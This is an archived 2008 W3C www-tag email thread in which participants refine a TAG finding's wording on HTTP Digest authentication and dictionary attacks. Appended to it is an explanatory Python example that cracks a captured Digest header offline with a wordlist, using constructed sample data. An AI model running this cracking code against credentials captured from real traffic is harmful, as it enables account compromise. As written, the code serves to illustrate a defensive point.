- From: ashok malhotra <ashok.malhotra@ORACLE.COM>
- Date: Fri, 02 May 2008 07:36:04 -0700
- To: noah_mendelsohn@us.ibm.com
- CC: David Orchard <orchard@pacificspirit.com>, www-tag@w3.org
+1 I agree that the prose could be improved but that can come later.

Ashok

noah_mendelsohn@us.ibm.com wrote:
> Dave: I took an action yesterday to review specifically your edits
> dealing with digest authentication. I'm glad to see that you followed up
> on the suggestion that digest may be acceptable when suitably strong
> passwords are chosen. The quibble I have is that you specifically suggest
> that only short alphanumeric strings can be cracked, and you imply that
> longer alphanumeric strings are the answer. I think both of those are
> questionable calls at best, and unnecessary to the essence of the point.
> So, I suggest the following edits to your original:
>
> <original>
> The Digest method is subject to dictionary attacks when passwords are
> short common alphanumeric strings. An attacker can easily compute the
> digest for a large set of such common passwords then compare against the
> transmitted message. This can be mitigated by the use of significantly
> longer strings, but this is very rare practice on the web. The Digest
> method is subject to man in the middle attacks because an intermediary can
> degrade the quality of service to basic authentication.
> </original>
>
> <suggested>
> The Digest method is subject to dictionary attacks, and must not be used
> except in circumstances where passwords are known to be of sufficient
> length and complexity to thwart such attacks. The sophistication and
> power of dictionary-based exploits continues to increase; where before
> such attacks targeted only short passwords using common terms, modern
> approaches can be effective in "cracking" certain longer or more complex
> passwords as well. Great care must therefore be taken if digest
> authentication is to be used, and it should be noted that few systems in
> common use on the Web today ensure the use of sufficiently strong
> passwords. The Digest method is >also< subject to man in the middle
> attacks because an intermediary can degrade the quality of service to be
> >no better than that of< basic authentication.
>
> </suggested>
>
> I'm short on time at the moment, and I suspect that a bit of editorial
> work would result in somewhat more appealing prose, but I think the
> essence of the changes is important. Anyway, I believe this discharges my
> action, and I will go into tracker and close it. Thank you.
>
> Noah
>
> --------------------------------------
> Noah Mendelsohn
> IBM Corporation
> One Rogers Street
> Cambridge, MA 02142
> 1-617-693-4036
> --------------------------------------
>
> "David Orchard" <orchard@pacificspirit.com>
> Sent by: www-tag-request@w3.org
> 05/02/2008 09:19 AM
>
> To: www-tag@w3.org
> cc: (bcc: Noah Mendelsohn/Cambridge/IBM)
> Subject: Updated passwordsInTheClear-52
>
> Changes:
>
> Added comments about digest authentication and use of strong passwords.
>
> Previous changes
>
> Updated abstract.
> Changed SHOULD NOT send passwords in the clear to MUST NOT and related
> text
> Added information on Digest Authentication vulnerabilities and warning
> Added SSL/TLS configuration warning.
>
> http://www.w3.org/2001/tag/doc/passwordsInTheClear-52
> http://www.w3.org/2001/tag/doc/passwordsInTheClear-52-20080501.html
>
> Cheers,
> Dave

--
All the best, Ashok
Received on Friday, 2 May 2008 14:39:11 UTC
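The offline dictionary attack that Dave's draft and Noah's suggested wording both describe (compute the digest for many candidate passwords and compare against the transmitted message) is concrete enough to show in code. The following is an added example written for this archive page; it is not code from the thread, from the TAG finding, or from any W3C project. It implements the RFC 2617 Digest response computation (algorithm=MD5, qop=auth), builds one Authorization header the way a client would, then plays the passive attacker who has captured that header and tries a wordlist against it. The username, realm, nonce, cnonce, URI, wordlist and both passwords are constructed for the example.

```python
import hashlib
import re


def _md5(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def digest_response(username, realm, password, method, uri, nonce, nc, cnonce, qop="auth"):
    """RFC 2617 response value for algorithm=MD5, qop=auth.

    HA1 = MD5(username:realm:password)
    HA2 = MD5(method:uri)
    response = MD5(HA1:nonce:nc:cnonce:qop:HA2)
    Everything except the password travels in the clear, which is what makes
    the offline guessing attack possible.
    """
    ha1 = _md5(f"{username}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


def make_authorization_header(username, realm, password, method, uri, nonce, cnonce, nc="00000001"):
    """Simulate the client: emit the Authorization header it would send."""
    response = digest_response(username, realm, password, method, uri, nonce, nc, cnonce)
    return (
        f'Digest username="{username}", realm="{realm}", nonce="{nonce}", '
        f'uri="{uri}", qop=auth, nc={nc}, cnonce="{cnonce}", response="{response}"'
    )


def parse_digest_header(header):
    """Split a Digest Authorization header into its name/value fields.

    Handles both quoted (realm="x") and unquoted (qop=auth, nc=00000001) values.
    """
    scheme, _, params = header.partition(" ")
    if scheme != "Digest":
        raise ValueError("not a Digest Authorization header")
    fields = {}
    for m in re.finditer(r'(\w+)=(?:"([^"]*)"|([^,\s]+))', params):
        fields[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    return fields


def crack_digest(header, method, candidates):
    """Passive attacker: given one captured header, try each candidate password.

    No further contact with the server is needed; each guess costs two MD5s
    (HA2 depends only on method and URI, so it is computed once). Returns the
    matching password, or None if the wordlist is exhausted.
    """
    f = parse_digest_header(header)
    target = f["response"].lower()
    ha2 = _md5(f"{method}:{f['uri']}")
    for pw in candidates:
        ha1 = _md5(f"{f['username']}:{f['realm']}:{pw}")
        guess = _md5(f"{ha1}:{f['nonce']}:{f['nc']}:{f['cnonce']}:{f.get('qop', 'auth')}:{ha2}")
        if guess == target:
            return pw
    return None


# Constructed sample data (not real credentials or a real capture).
CAPTURED_METHOD = "GET"
_REALM = "example.org"
_NONCE = "dcd98b7102dd2f0e8b11d0f600bfb0c093"
_CNONCE = "0a4f113b"
_URI = "/private"

# A weak, common password: the case Dave's draft warns about.
CAPTURED_HEADER = make_authorization_header(
    "alice", _REALM, "letmein", CAPTURED_METHOD, _URI, _NONCE, _CNONCE
)
# A long, high-entropy password: the case Noah's wording permits, with care.
STRONG_HEADER = make_authorization_header(
    "alice", _REALM, "Q7#vR!2pLx@9sZ-wordlist-miss", CAPTURED_METHOD, _URI, _NONCE, _CNONCE
)

# Tiny constructed wordlist standing in for a multi-million-entry dictionary.
WORDLIST = ["password", "123456", "qwerty", "letmein", "welcome", "admin"]


if __name__ == "__main__":
    print("weak  :", crack_digest(CAPTURED_HEADER, CAPTURED_METHOD, WORDLIST))
    print("strong:", crack_digest(STRONG_HEADER, CAPTURED_METHOD, WORDLIST))
```

The point Noah makes about attack power is visible in the shape of `crack_digest`: the per-guess cost is two MD5 computations over a few dozen bytes, and the loop needs only the single captured request, so the number of candidates an attacker can afford is bounded by hardware, not by anything the server does. Length and complexity of the password are the only knobs the deployer controls, which is exactly why the suggested wording conditions use of Digest on them.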